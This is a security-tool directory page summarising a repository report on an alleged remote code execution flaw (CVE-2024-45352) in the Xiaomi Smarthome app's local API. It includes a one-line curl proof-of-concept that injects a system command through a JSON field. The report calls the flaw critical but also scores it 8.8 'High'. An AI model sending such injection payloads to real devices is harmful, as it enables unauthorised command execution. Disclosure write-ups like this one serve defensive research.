Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
-CVE-2024-45352 — Technical report about a critical vulnerability in Xiaomi (CVE-2024-45352) | Kitploit
Tools/GitHubGitHub/edwins907/-cve-2024-45352
IoT SecurityVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingHardware & IoT Security
GitHubedwins907/-cve-2024-45352

-CVE-2024-45352

Technical report about a critical vulnerability in Xiaomi (CVE-2024-45352)

View Repository
121 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

🚨 CVE-2024-45352 – Xiaomi Smarthome Remote Code Execution (RCE)

📌 Summary

A critical vulnerability (CVE-2024-45352) was discovered in the Xiaomi Smarthome application, allowing unauthenticated remote code execution (RCE) via improper input handling in the internal API parser. This vulnerability can be exploited by an attacker on the local network to execute arbitrary commands on the affected system.


🛡️ CVE ID

  • CVE: CVE-2024-45352
  • CVSS (Estimated): 8.8 (High)
  • Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None

🧪 Proof of Concept (PoC)

The following PoC demonstrates the RCE via a maliciously crafted request to the Xiaomi Smarthome local API:

root@kitploit:~
curl -X POST http://<target_ip>:<port>/api/parse --data '{"script":"system('id')"}'
Download Tool